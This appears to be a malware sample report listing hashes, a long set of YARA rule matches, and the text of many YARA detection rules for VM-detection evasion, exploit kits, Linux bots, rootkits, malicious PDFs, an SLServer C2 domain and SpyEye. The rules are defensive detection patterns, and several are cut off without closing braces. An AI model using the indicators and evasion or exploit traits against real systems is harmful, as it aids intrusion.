Sample details: 27f54e0271e4f58b7d3c8ddc5c6d617f --

Hashes
MD5: 27f54e0271e4f58b7d3c8ddc5c6d617f
SHA1: 200ba1b0208a1fd4215b334fdea6e661105523c9
SHA256: e7bc1cd67b6d40cb5231bf1f5217475e84c52c5e684b3b9ce6378eebd9b2b1e0
SSDEEP: 12288:KFRRXPX+3hIyUyZFeRpTlrSszUgjN7wryCqhn8D4Oq2ugbpQgwGaNrId:KfR/XEhIyTeRzWszTKryCqjOugRaI
Details
File Type: data
Yara Hits
CuckooSandbox/embedded_pe | CuckooSandbox/embedded_win_api | CuckooSandbox/vmdetect | FlorianRoth/Empire_Get_SecurityPackages | FlorianRoth/Empire_Invoke_PowerDump | FlorianRoth/Empire_Invoke_ShellcodeMSIL | FlorianRoth/Empire_Invoke_SmbScanner | FlorianRoth/Empire_Invoke_EgressCheck | FlorianRoth/Empire_Invoke_PostExfil | FlorianRoth/Empire_Invoke_SMBAutoBrute | FlorianRoth/Empire_Get_Keystrokes | FlorianRoth/Empire_Invoke_DllInjection | FlorianRoth/Empire_KeePassConfig | FlorianRoth/Empire_PowerShell_Framework_Gen1 | FlorianRoth/Empire_PowerUp_Gen | FlorianRoth/Empire_PowerShell_Framework_Gen2 | FlorianRoth/Empire_KeePassConfig_Gen | FlorianRoth/Empire_Invoke_Portscan_Gen | FlorianRoth/Empire_Invoke_CredentialInjection_Invoke_Mimikatz_Gen | FlorianRoth/Empire_Invoke_Gen | FlorianRoth/Mal_http_EXE | FlorianRoth/Mal_PotPlayer_DLL | FlorianRoth/ScanBox_Malware_Generic | FlorianRoth/EQGRP_create_dns_injection | FlorianRoth/EQGRP_screamingplow | FlorianRoth/EQGRP_MixText | FlorianRoth/EQGRP_tunnel_state_reader | FlorianRoth/EQGRP_payload | FlorianRoth/EQGRP_eligiblecandidate | FlorianRoth/EQGRP_BUSURPER_2211_724 | FlorianRoth/EQGRP_networkProfiler_orderScans | FlorianRoth/EQGRP_epicbanana_2_1_0_1 | FlorianRoth/EQGRP_sniffer_xml2pcap | FlorianRoth/EQGRP_BananaAid | FlorianRoth/EQGRP_config_jp1_UA | FlorianRoth/EQGRP_userscript | FlorianRoth/EQGRP_BUSURPER_3001_724 | FlorianRoth/EQGRP_workit | FlorianRoth/EQGRP_tinyhttp_setup | FlorianRoth/EQGRP_EPBA | FlorianRoth/EQGRP_jetplow_SH | FlorianRoth/EQGRP_extrabacon | FlorianRoth/EQGRP_sploit_py | FlorianRoth/EQGRP_uninstallPBD | FlorianRoth/EQGRP_BICECREAM | FlorianRoth/EQGRP_BFLEA_2201 | FlorianRoth/EQGRP_StoreFc | FlorianRoth/EQGRP_BBALL | FlorianRoth/EQGRP_BARPUNCH_BPICKER | FlorianRoth/EQGRP_Implants_Gen5 | FlorianRoth/EQGRP_pandarock | FlorianRoth/EQGRP_BananaUsurper_writeJetPlow | FlorianRoth/EQGRP_Implants_Gen4 | FlorianRoth/EQGRP_Implants_Gen3 | FlorianRoth/EQGRP_BLIAR_BLIQUER | FlorianRoth/EQGRP_sploit | FlorianRoth/EQGRP_Implants_Gen2 | FlorianRoth/EQGRP_Implants_Gen1 | FlorianRoth/EQGRP_ssh_telnet_29 | FlorianRoth/EQGRP_callbacks | FlorianRoth/EQGRP_Extrabacon_Output | FlorianRoth/EQGRP_Unique_Strings | FlorianRoth/OPCLEAVER_BackDoorLogger | FlorianRoth/OPCLEAVER_Jasus | FlorianRoth/OPCLEAVER_ShellCreator2 | FlorianRoth/OPCLEAVER_SmartCopy2 | FlorianRoth/OPCLEAVER_TinyZBot | FlorianRoth/OPCLEAVER_ZhoupinExploitCrew | FlorianRoth/OPCLEAVER_antivirusdetector | FlorianRoth/OPCLEAVER_csext | FlorianRoth/OPCLEAVER_kagent | FlorianRoth/OPCLEAVER_mimikatzWrapper | FlorianRoth/OPCLEAVER_pvz_in | FlorianRoth/OPCLEAVER_zhLookUp | FlorianRoth/OPCLEAVER_zhmimikatz | FlorianRoth/OPCLEAVER_CCProxy_Config | FlorianRoth/RAT_Adzok | FlorianRoth/RAT_Ap0calypse | FlorianRoth/RAT_BlackShades | FlorianRoth/RAT_BlueBanana | FlorianRoth/RAT_Bozok | FlorianRoth/RAT_ClientMesh | FlorianRoth/RAT_DarkComet | FlorianRoth/RAT_DarkRAT | FlorianRoth/RAT_JavaDropper | FlorianRoth/RAT_LostDoor | FlorianRoth/RAT_NanoCore | FlorianRoth/RAT_Paradox | FlorianRoth/RAT_QRat | FlorianRoth/RAT_ShadowTech | FlorianRoth/RAT_Sub7Nation | FlorianRoth/RAT_Vertex | FlorianRoth/RAT_unrecom | FlorianRoth/Casper_Included_Strings | FlorianRoth/Casper_SystemInformation_Output | FlorianRoth/FVEY_ShadowBrokers_Jan17_Screen_Strings | FlorianRoth/OilRig_Malware_Campaign_Gen2 | FlorianRoth/Greenbug_Malware_4 | FlorianRoth/Greenbug_Malware_5 | FlorianRoth/EquationGroup_elgingamble | FlorianRoth/EquationGroup_cmsd | FlorianRoth/EquationGroup_ebbshave | FlorianRoth/EquationGroup_eggbasket | FlorianRoth/EquationGroup_sambal | FlorianRoth/EquationGroup_cmsex | FlorianRoth/EquationGroup_DUL | FlorianRoth/EquationGroup_slugger2 | FlorianRoth/EquationGroup_jackpop | FlorianRoth/EquationGroup_epoxyresin_v1_0_0 | FlorianRoth/EquationGroup_estesfox | FlorianRoth/EquationGroup__ftshell_ftshell_v3_10_3_0 | FlorianRoth/EquationGroup__scanner_scanner_v2_1_2 | FlorianRoth/EquationGroup__ghost_sparc_ghost_x86_3 | FlorianRoth/EquationGroup__jparsescan_parsescan_5 | FlorianRoth/EquationGroup__ftshell | FlorianRoth/EquationGroup_Toolset_Apr17_Eternalromance | FlorianRoth/EquationGroup_Toolset_Apr17_Gen2 | FlorianRoth/EquationGroup_Toolset_Apr17__DoubleFeatureReader_DoubleFeatureReader_0 | FlorianRoth/EquationGroup_Toolset_Apr17__EAFU_ecwi_ESKE_EVFR_RPC2_4 | FlorianRoth/Regin_Related_Malware | FlorianRoth/Unit78020_Malware_Gen1 | FlorianRoth/Unit78020_Malware_Gen3 | FlorianRoth/APT_Liudoor | FlorianRoth/IronPanda_DNSTunClient | FlorianRoth/IronPanda_Malware_Htran | FlorianRoth/DeepPanda_lot1 | FlorianRoth/DeepPanda_htran_exe | FlorianRoth/GRIZZLY_STEPPE_Malware_2 | FlorianRoth/Sofacy_Fybis_ELF_Backdoor_Gen1 | FlorianRoth/PoseidonGroup_Malware | FlorianRoth/apt_equation_equationlaser_runtimeclasses | FlorianRoth/EquationDrug_HDDSSD_Op | FlorianRoth/Payload_Exe2Hex | FlorianRoth/WaterBug_wipbot_2013_dll | FlorianRoth/apt_hellsing_implantstrings | FlorianRoth/IMPLANT_3_v1 | FlorianRoth/BernhardPOS | FlorianRoth/FVEY_ShadowBroker_Auct_Dez16_Strings | FlorianRoth/Turla_APT_Malware_Gen1 | FlorianRoth/Turla_APT_Malware_Gen2 | FlorianRoth/Turla_APT_Malware_Gen3 | FlorianRoth/APT_Project_Sauron_Scripts | FlorianRoth/APT_Project_Sauron_arping_module | FlorianRoth/APT_Project_Sauron_kblogi_module | FlorianRoth/APT_Project_Sauron_basex_module | FlorianRoth/APT_Project_Sauron_dext_module | FlorianRoth/REDLEAVES_CoreImplant_UniqueStrings | FlorianRoth/PLUGX_RedLeaves | FlorianRoth/Invoke_mimikittenz | FlorianRoth/APT_Malware_PutterPanda_Rel | FlorianRoth/Codoso_CustomTCP_4 | FlorianRoth/Codoso_Gh0st_3 | FlorianRoth/Codoso_Gh0st_1 | FlorianRoth/Codoso_PGV_PVID_1 | FlorianRoth/shimrat | FlorianRoth/shimratreporter | FlorianRoth/WoolenGoldfish_Sample_1 | FlorianRoth/WoolenGoldfish_Generic_3 | FlorianRoth/Hacktool_Strings_p0wnedShell | FlorianRoth/Nanocore_RAT_Gen_1 | FlorianRoth/Nanocore_RAT_Gen_2 | FlorianRoth/apt_RU_MoonlightMaze_customlokitools | FlorianRoth/apt_RU_MoonlightMaze_customsniffer | FlorianRoth/apt_RU_MoonlightMaze_de_tool | FlorianRoth/apt_RU_MoonlightMaze_cle_tool | FlorianRoth/apt_RU_MoonlightMaze_xk_keylogger | FlorianRoth/Trojan_Win32_Plaplex | FlorianRoth/Trojan_Win32_Adupib | KevTheHermit/Paradox | KevTheHermit/Bozok | KevTheHermit/unrecom | KevTheHermit/DarkRAT | KevTheHermit/JavaDropper | KevTheHermit/LostDoor | KevTheHermit/BlackShades | KevTheHermit/Sub7Nation | KevTheHermit/BlueBanana | KevTheHermit/Crimson | KevTheHermit/NanoCore | KevTheHermit/DarkComet | KevTheHermit/Ap0calypse | KevTheHermit/Adzok | KevTheHermit/ShadowTech | KevTheHermit/Vertex | BAMFDetect/dexter_strings | BAMFDetect/BlackShadesServer | BAMFDetect/diamond_fox | BAMFDetect/backoff | BAMFDetect/DarkComet | BAMFDetect/alina | BAMFDetect/NanoCore | BAMFDetect/pony | BAMFDetect/easterjackpos | BAMFDetect/genome | BAMFDetect/Bozok | BAMFDetect/dendroid |
Strings
		// https://otx.alienvault.com/pulse/5977d20f481b4c736cf5f810
rule WMI_VM_Detect : WMI_VM_Detect   
   	{   
   	    meta:   
      
      
   	        version = 2   
   	        threat = "Using WMI to detect virtual machines via querying video card information"   
   	        behaviour_class = "Evasion"   
   	        author = "Joe Giron"   
   	        date = "2015-09-25"   
   	        description = "Detection of Virtual Appliances through the use of WMI for use of evasion."   
      
      
   			strings:   
      
      
   			$selstr 	= "SELECT Description FROM Win32_VideoController" nocase ascii wide   
   			$selstr2 	= "SELECT * FROM Win32_VideoController" nocase ascii wide   
   			$vm1 		= "virtualbox graphics adapter" nocase ascii wide   
   			$vm2 		= "vmware svga ii" nocase ascii wide   
   			$vm3 		= "vm additions s3 trio32/64" nocase ascii wide   
   			$vm4 		= "parallel" nocase ascii wide   
   			$vm5 		= "remotefx" nocase ascii wide   
   			$vm6 		= "cirrus logic" nocase ascii wide   
   			$vm7 		= "matrox" nocase ascii wide   
      
      
   			condition:   
   			any of ($selstr*) and any of ($vm*)   
      
      
      
      
// https://otx.alienvault.com/pulse/5977d4dbf7cda57edf57bdbd
rule bleedinglife2_adobe_2010_2884_exploit : EK   
   {   
   meta:   
      author = "Josh Berry"   
      date = "2016-06-26"   
      description = "BleedingLife2 Exploit Kit Detection"   
      hash0 = "b22ac6bea520181947e7855cd317c9ac"   
      sample_filetype = "unknown"   
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
      $string0 = "_autoRepeat"   
      $string1 = "embedFonts"   
      $string2 = "KeyboardEvent"   
      $string3 = "instanceStyles"   
      $string4 = "InvalidationType"   
      $string5 = "autoRepeat"   
      $string6 = "getScaleX"   
      $string7 = "RadioButton_selectedDownIcon"   
      $string8 = "configUI"   
      $string9 = "deactivate"   
      $string10 = "fl.controls:Button"   
      $string11 = "_mouseStateLocked"   
      $string12 = "fl.core.ComponentShim"   
      $string13 = "toString"   
      $string14 = "_group"   
      $string15 = "addRadioButton"   
      $string16 = "inCallLaterPhase"   
      $string17 = "oldMouseState"   
   condition:   
      17 of them   
rule bleedinglife2_jar2 : EK   
   {   
   meta:   
      author = "Josh Berry"   
      date = "2016-06-26"   
      description = "BleedingLife2 Exploit Kit Detection"   
      hash0 = "2bc0619f9a0c483f3fd6bce88148a7ab"   
      sample_filetype = "unknown"   
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
      $string0 = "META-INF/MANIFEST.MFPK"   
      $string1 = "RequiredJavaComponent.classPK"   
      $string2 = "META-INF/JAVA.SFm"   
      $string3 = "RequiredJavaComponent.class"   
      $string4 = "META-INF/MANIFEST.MF"   
      $string5 = "META-INF/JAVA.DSAPK"   
      $string6 = "META-INF/JAVA.SFPK"   
      $string7 = "5EVTwkx"   
      $string8 = "META-INF/JAVA.DSA3hb"   
      $string9 = "y\\Dw -"   
   condition:   
      9 of them   
rule bleedinglife2_adobe_2010_1297_exploit : EK PDF   
   {   
   meta:   
      author = "Josh Berry"   
      date = "2016-06-26"   
      description = "BleedingLife2 Exploit Kit Detection"   
      hash0 = "8179a7f91965731daa16722bd95f0fcf"   
      sample_filetype = "unknown"   
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
      $string0 = "getSharedStyle"   
      $string1 = "currentCount"   
      $string2 = "String"   
      $string3 = "setSelection"   
      $string4 = "BOTTOM"   
      $string5 = "classToInstancesDict"   
      $string6 = "buttonDown"   
      $string7 = "focusRect"   
      $string8 = "pill11"   
      $string9 = "TEXT_INPUT"   
      $string10 = "restrict"   
      $string11 = "defaultButtonEnabled"   
      $string12 = "copyStylesToChild"   
      $string13 = " xmlns:xmpMM"   
      $string14 = "_editable"   
      $string15 = "classToDefaultStylesDict"   
      $string16 = "IMEConversionMode"   
      $string17 = "Scene 1"   
   condition:   
      17 of them   
// https://otx.alienvault.com/pulse/560c150e67db8c47d4ce2b14
rule LinuxTsunami   
   {   
       meta:   
   	   
   		Author      = "@benkow_"   
   		Date        = "2014/09/12"    
   		Description = "Strings inside"   
   		Reference   = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483"   
      
       strings:   
           $a = "PRIVMSG %s :[STD]Hitting %s"   
           $b = "NOTICE %s :TSUNAMI <target> <secs>"   
           $c = "NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually."   
       condition:   
           $a or $b or $c   
rule LinuxElknot   
   {   
       meta:   
   	Author      = "@benkow_"   
           Date        = "2013/12/24"    
           Description = "Strings inside"   
           Reference   = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3099"   
      
       strings:   
           $a = "ZN8CUtility7DeCryptEPciPKci"   
   	$b = "ZN13CThreadAttack5StartEP11CCmdMessage"   
      
       condition:   
   	all of them   
rule exploit   
   {   
           meta:   
                   author="xorseed"   
                   reference= "https://stuff.rop.io/"   
   	strings:   
   		$xpl1 = "set_fs_root" nocase ascii wide   
   		$xpl2 = "set_fs_pwd" nocase ascii wide   
   		$xpl3 = "__virt_addr_valid" nocase ascii wide   
   		$xpl4 = "init_task" nocase ascii wide   
   		$xpl5 = "init_fs" nocase ascii wide   
   		$xpl6 = "bad_file_ops" nocase ascii wide   
   		$xpl7 = "bad_file_aio_read" nocase ascii wide   
   		$xpl8 = "security_ops" nocase ascii wide   
   		$xpl9 = "default_security_ops" nocase ascii wide   
   		$xpl10 = "audit_enabled" nocase ascii wide   
   		$xpl11 = "commit_creds" nocase ascii wide   
   		$xpl12 = "prepare_kernel_cred" nocase ascii wide   
   		$xpl13 = "ptmx_fops" nocase ascii wide   
   		$xpl14 = "node_states" nocase ascii wide   
   	condition:   
   		7 of them   
rule LinuxMrBlack   
   {   
       meta:   
   	Author      = "@benkow_"   
           Date        = "2014/09/12"    
           Description = "Strings inside"   
           Reference   = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483"   
      
       strings:   
           $a = "Mr.Black"   
   	$b = "VERS0NEX:%s|%d|%d|%s"   
       condition:   
           $a and $b   
rule LinuxBillGates    
   {   
       meta:   
          Author      = "@benkow_"   
          Date        = "2014/08/11"    
          Description = "Strings inside"   
          Reference   = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3429"    
      
       strings:   
           $a= "12CUpdateGates"   
           $b= "11CUpdateBill"   
      
       condition:   
           $a and $b   
rule rootkit   
   {   
   	meta:   
                   author="xorseed"   
                   reference= "https://stuff.rop.io/"   
   	strings:   
   		$sys1 = "sys_write" nocase ascii wide	   
   		$sys2 = "sys_getdents" nocase ascii wide   
   		$sys3 = "sys_getdents64" nocase ascii wide   
   		$sys4 = "sys_getpgid" nocase ascii wide   
   		$sys5 = "sys_getsid" nocase ascii wide   
   		$sys6 = "sys_setpgid" nocase ascii wide   
   		$sys7 = "sys_kill" nocase ascii wide   
   		$sys8 = "sys_tgkill" nocase ascii wide   
   		$sys9 = "sys_tkill" nocase ascii wide   
   		$sys10 = "sys_sched_setscheduler" nocase ascii wide   
   		$sys11 = "sys_sched_setparam" nocase ascii wide   
   		$sys12 = "sys_sched_getscheduler" nocase ascii wide   
   		$sys13 = "sys_sched_getparam" nocase ascii wide   
   		$sys14 = "sys_sched_setaffinity" nocase ascii wide   
   		$sys15 = "sys_sched_getaffinity" nocase ascii wide   
   		$sys16 = "sys_sched_rr_get_interval" nocase ascii wide   
   		$sys17 = "sys_wait4" nocase ascii wide   
   		$sys18 = "sys_waitid" nocase ascii wide   
   		$sys19 = "sys_rt_tgsigqueueinfo" nocase ascii wide   
   		$sys20 = "sys_rt_sigqueueinfo" nocase ascii wide   
   		$sys21 = "sys_prlimit64" nocase ascii wide   
   		$sys22 = "sys_ptrace" nocase ascii wide   
   		$sys23 = "sys_migrate_pages" nocase ascii wide   
   		$sys24 = "sys_move_pages" nocase ascii wide   
   		$sys25 = "sys_get_robust_list" nocase ascii wide   
   		$sys26 = "sys_perf_event_open" nocase ascii wide   
   		$sys27 = "sys_uname" nocase ascii wide   
   		$sys28 = "sys_unlink" nocase ascii wide   
   		$sys29 = "sys_unlikat" nocase ascii wide   
   		$sys30 = "sys_rename" nocase ascii wide   
   		$sys31 = "sys_read" nocase ascii wide   
   		$sys32 = "kobject_del" nocase ascii wide   
   		$sys33 = "list_del_init" nocase ascii wide   
   		$sys34 = "inet_ioctl" nocase ascii wide   
   	condition:   
   		9 of them   
// https://otx.alienvault.com/pulse/59152852e159ed10ba8631ec
rule invalid_XObject_js : PDF raw   
   	{   
   		meta:   
   			author = "Glenn Edwards (@hiddenillusion)"   
   			description = "XObject's require v1.4+"   
   			ref = "https://blogs.adobe.com/ReferenceXObjects/"   
   			version = "0.1"   
   			weight = 2   
   			   
   		strings:   
   			$magic = { 25 50 44 46 }   
   			$ver = /%PDF-1\.[4-9]/   
   			   
   			$attrib0 = /\/XObject/   
   			$attrib1 = /\/JavaScript/   
   			   
   		condition:   
   			$magic in (0..1024) and not $ver and all of ($attrib*)   
rule suspicious_creator : PDF raw   
   	{   
   		meta:   
   			author = "Glenn Edwards (@hiddenillusion)"   
   			version = "0.1"   
   			weight = 3   
   			   
   		strings:   
   			$magic = { 25 50 44 46 }   
   			$header = /%PDF-1\.(3|4|6)/   
   			   
   			$creator0 = "yen vaw"   
   			$creator1 = "Scribus"   
   			$creator2 = "Viraciregavi"   
   		condition:   
   			$magic in (0..1024) and $header and 1 of ($creator*)   
rule XDP_embedded_PDF : PDF raw   
   	{   
   		meta:   
   			author = "Glenn Edwards (@hiddenillusion)"   
   			version = "0.1"   
   			ref = "http://blog.9bplus.com/av-bypass-for-malicious-pdfs-using-xdp"   
   	        weight = 1		   
      
      
   		strings:   
   			$s1 = "<pdf xmlns="   
   			$s2 = "<chunk>"   
   			$s3 = "</pdf>"   
   			$header0 = "%PDF"   
   			$header1 = "JVBERi0"   
      
      
   		condition:   
   			all of ($s*) and 1 of ($header*)   
rule multiple_filtering : PDF raw   
   	{   
   	meta:    
   	author = "Glenn Edwards (@hiddenillusion)"   
   	version = "0.2"   
   	weight = 3   
      
      
   	    strings:   
   	            $magic = { 25 50 44 46 }   
   	            $attrib = /\/Filter.*(\/ASCIIHexDecode\W+|\/LZWDecode\W+|\/ASCII85Decode\W+|\/FlateDecode\W+|\/RunLengthDecode){2}/    
   	            // left out: /CCITTFaxDecode, JBIG2Decode, DCTDecode, JPXDecode, Crypt   
      
      
   	    condition:    
   	            $magic in (0..1024) and $attrib   
rule suspicious_author : PDF raw   
   	{   
   		meta:   
   			author = "Glenn Edwards (@hiddenillusion)"   
   			version = "0.1"   
   			weight = 4   
   			   
   		strings:   
   			$magic = { 25 50 44 46 }   
   			$header = /%PDF-1\.(3|4|6)/   
      
      
   			$author0 = "Ubzg1QUbzuzgUbRjvcUb14RjUb1"   
   			$author1 = "ser pes"   
   			$author2 = "Miekiemoes"   
   			$author3 = "Nsarkolke"   
   		condition:   
   			$magic in (0..1024) and $header and 1 of ($author*)   
rule suspicious_js : PDF raw   
   	{   
   		meta:   
   			author = "Glenn Edwards (@hiddenillusion)"   
   			version = "0.1"   
   			weight = 3   
   			   
   		strings:   
   			$magic = { 25 50 44 46 }   
   			   
   			$attrib0 = /\/OpenAction /   
   			$attrib1 = /\/JavaScript /   
      
      
   			$js0 = "eval"   
   			$js1 = "Array"   
   			$js2 = "String.fromCharCode"   
   			   
   		condition:   
   			$magic in (0..1024) and all of ($attrib*) and 2 of ($js*)   
rule suspicious_obfuscation : PDF raw   
   	{   
   		meta:   
   			author = "Glenn Edwards (@hiddenillusion)"   
   			version = "0.1"   
   			weight = 2   
   			   
   		strings:   
   			$magic = { 25 50 44 46 }   
   			$reg = /\/\w#[a-zA-Z0-9]{2}#[a-zA-Z0-9]{2}/   
   			   
   		condition:   
   			$magic in (0..1024) and #reg > 5   
rule PDF_Embedded_Exe : PDF   
   	{   
   		meta:   
   			ref = "https://github.com/jacobsoo/Yara-Rules/blob/master/PDF_Embedded_Exe.yar"   
   		strings:   
   	    	$header = {25 50 44 46}   
   	    	$Launch_Action = {3C 3C 2F 53 2F 4C 61 75 6E 63 68 2F 54 79 70 65 2F 41 63 74 69 6F 6E 2F 57 69 6E 3C 3C 2F 46}   
   	        $exe = {3C 3C 2F 45 6D 62 65 64 64 65 64 46 69 6C 65 73}   
   	    condition:   
   	    	$header at 0 and $Launch_Action and $exe   
rule suspicious_creation : PDF raw   
   	{   
   		meta:   
   			author = "Glenn Edwards (@hiddenillusion)"   
   			version = "0.1"   
   			weight = 2   
   			   
   		strings:   
   			$magic = { 25 50 44 46 }   
   			$header = /%PDF-1\.(3|4|6)/   
   			   
   			$create0 = /CreationDate \(D:20101015142358\)/   
   			$create1 = /CreationDate \(2008312053854\)/   
   		condition:   
   			$magic in (0..1024) and $header and 1 of ($create*)   
rule shellcode_blob_metadata : PDF raw   
   	{   
   	        meta:   
   	                author = "Glenn Edwards (@hiddenillusion)"   
   	                version = "0.1"   
   	                description = "When there's a large Base64 blob inserted into metadata fields it often indicates shellcode to later be decoded"   
   	                weight = 4   
   	        strings:   
   	                $magic = { 25 50 44 46 }   
      
      
   	                $reg_keyword = /\/Keywords.?\(([a-zA-Z0-9]{200,})/ //~6k was observed in BHEHv2 PDF exploits holding the shellcode   
   	                $reg_author = /\/Author.?\(([a-zA-Z0-9]{200,})/   
   	                $reg_title = /\/Title.?\(([a-zA-Z0-9]{200,})/   
   	                $reg_producer = /\/Producer.?\(([a-zA-Z0-9]{200,})/   
   	                $reg_creator = /\/Creator.?\(([a-zA-Z0-9]{300,})/   
   	                $reg_create = /\/CreationDate.?\(([a-zA-Z0-9]{200,})/   
      
      
   	        condition:   
   	                $magic in (0..1024) and 1 of ($reg*)   
rule suspicious_producer : PDF raw    
   	{   
   		meta:   
   			author = "Glenn Edwards (@hiddenillusion)"   
   			version = "0.1"   
   			weight = 2   
   			   
   		strings:   
   			$magic = { 25 50 44 46 }   
   			$header = /%PDF-1\.(3|4|6)/   
   			   
   			$producer0 = /Producer \(Scribus PDF Library/   
   			$producer1 = "Notepad"   
   		condition:   
   			$magic in (0..1024) and $header and 1 of ($producer*)   
rule suspicious_title : PDF raw   
   	{   
   		meta:   
   			author = "Glenn Edwards (@hiddenillusion)"   
   			version = "0.1"   
   			weight = 4   
   			   
   		strings:   
   			$magic = { 25 50 44 46 }   
   			$header = /%PDF-1\.(3|4|6)/   
   			   
   			$title0 = "who cis"   
   			$title1 = "P66N7FF"   
   			$title2 = "Fohcirya"   
   		condition:   
   			$magic in (0..1024) and $header and 1 of ($title*)   
rule suspicious_launch_action : PDF raw   
   	{   
   		meta:   
   			author = "Glenn Edwards (@hiddenillusion)"   
   			version = "0.1"   
   			weight = 2   
   			   
   		strings:   
   			$magic = { 25 50 44 46 }   
   			   
   			$attrib0 = /\/Launch/   
   			$attrib1 = /\/URL /   
   			$attrib2 = /\/Action/   
   			$attrib3 = /\/OpenAction/   
   			$attrib4 = /\/F /   
      
      
   		condition:   
   			$magic in (0..1024) and 3 of ($attrib*)   
rule BlackHole_v2 : PDF raw   
   	{   
   		meta:   
   			author = "Glenn Edwards (@hiddenillusion)"   
   			version = "0.1"   
   			ref = "http://fortknoxnetworks.blogspot.no/2012/10/blackhhole-exploit-kit-v-20-url-pattern.html"   
   			weight = 3   
   			   
   		strings:   
   			$magic = { 25 50 44 46 }   
   			$content = "Index[5 1 7 1 9 4 23 4 50"   
   			   
   		condition:   
   			$magic in (0..1024) and $content   
rule suspicious_embed : PDF raw   
   	{   
   		meta:   
   			author = "Glenn Edwards (@hiddenillusion)"   
   			version = "0.1"   
   			ref = "https://feliam.wordpress.com/2010/01/13/generic-pdf-exploit-hider-embedpdf-py-and-goodbye-av-detection-012010/"   
   			weight = 2   
   			   
   		strings:   
   			$magic = { 25 50 44 46 }   
   			   
   			$meth0 = /\/Launch/   
   			$meth1 = /\/GoTo(E|R)/ //means go to embedded or remote   
   			$attrib0 = /\/URL /   
   			$attrib1 = /\/Action/   
   			$attrib2 = /\/Filespec/   
   			   
   		condition:   
   			$magic in (0..1024) and 1 of ($meth*) and 2 of ($attrib*)   
// https://otx.alienvault.com/pulse/5621208f4637f21ecf2aac36
rule SLServer_command_and_control   
   {   
         
       meta:   
           author = "Matt Brooks, @cmatthewbrooks"   
           desc = "Searches for the C2 server."   
           ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/"   
          
       strings:   
           $c2 = "safetyssl.security-centers.com"   
              
       condition:   
           //MZ header //PE signature   
           uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $c2   
rule dubseven_dropper_registry_checks   
   {   
          
       meta:   
           author = "Matt Brooks, @cmatthewbrooks"   
           desc = "Searches for registry keys checked for by the dropper"   
          
       strings:   
           $reg1 = "SOFTWARE\\360Safe\\Liveup"   
           $reg2 = "Software\\360safe"   
           $reg3 = "SOFTWARE\\kingsoft\\Antivirus"   
           $reg4 = "SOFTWARE\\Avira\\Avira Destop"   
           $reg5 = "SOFTWARE\\rising\\RAV"   
           $reg6 = "SOFTWARE\\JiangMin"   
           $reg7 = "SOFTWARE\\Micropoint\\Anti-Attack"   
      
       condition:   
           //MZ header //PE signature   
           uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and all of ($reg*)   
rule dubseven_dropper_dialog_remains   
   {   
         
       meta:   
           author = "Matt Brooks, @cmatthewbrooks"   
           desc = "Searches for related dialog remnants. How rude."   
          
       strings:   
           $dia1 = "fuckMessageBox 1.0" wide   
           $dia2 = "Rundll 1.0" wide   
              
       condition:   
           //MZ header //PE signature   
           uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and any of them   
rule dubseven_file_set   
   {   
          
       meta:   
           author = "Matt Brooks, @cmatthewbrooks"   
           desc = "Searches for service files loading UP007"   
          
       strings:   
           $file1 = "\\Microsoft\\Internet Explorer\\conhost.exe"   
           $file2 = "\\Microsoft\\Internet Explorer\\dll2.xor"   
           $file3 = "\\Microsoft\\Internet Explorer\\HOOK.DLL"   
           $file4 = "\\Microsoft\\Internet Explorer\\main.dll"   
           $file5 = "\\Microsoft\\Internet Explorer\\nvsvc.exe"   
           $file6 = "\\Microsoft\\Internet Explorer\\SBieDll.dll"   
           $file7 = "\\Microsoft\\Internet Explorer\\mon"   
           $file8 = "\\Microsoft\\Internet Explorer\\runas.exe"   
              
       condition:   
           //MZ header //PE signature //Just a few of these as they differ   
      
           uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and 3 of ($file*)   
rule SLServer_mutex   
   {   
          
       meta:   
           author = "Matt Brooks, @cmatthewbrooks"   
           desc = "Searches for the mutex."   
           ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/"   
          
       strings:   
           $mutex = "M&GX^DSF&DA@F"   
              
       condition:   
           //MZ header //PE signature   
           uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $mutex   
rule SLServer_campaign_code   
   {   
       meta:   
           author = "Matt Brooks, @cmatthewbrooks"   
           desc = "Searches for the related campaign code."   
           ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/"   
          
       strings:   
           $campaign = "wthkdoc0106"   
              
       condition:   
           //MZ header //PE signature   
           uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $campaign   
rule SLServer_unknown_string   
   {   
       meta:   
           author = "Matt Brooks, @cmatthewbrooks"   
           desc = "Searches for a unique string."   
           ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/"   
          
       strings:   
           $string = "test-b7fa835a39"   
              
       condition:   
           //MZ header //PE signature   
           uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $string   
rule maindll_mutex   
   {   
         
       meta:   
           author = "Matt Brooks, @cmatthewbrooks"   
           desc = "Matches on the maindll mutex"   
           ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/"   
              
       strings:   
           $mutex = "h31415927tttt"   
              
       condition:   
           //MZ header  //PE signature   
           uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $mutex   
// https://otx.alienvault.com/pulse/577c802c52c9260135acd45f
rule spyeye : banker   
   {   
   	meta:   
   		author = "Jean-Philippe Teissier / @Jipe_"   
   		description = "SpyEye X.Y memory"   
   		date = "2012-05-23"    
   		version = "1.0"    
   		filetype = "memory"   
      
   	strings:   
   		$spyeye = "SpyEye"   
   		$a = "%BOTNAME%"   
   		$b = "globplugins"   
   		$c = "data_inject"   
   		$d = "data_before"   
   		$e = "data_after"   
   		$f = "data_end"   
   		$g = "bot_version"   
   		$h = "bot_guid"   
   		$i = "TakeBotGuid"   
   		$j = "TakeGateToCollector"   
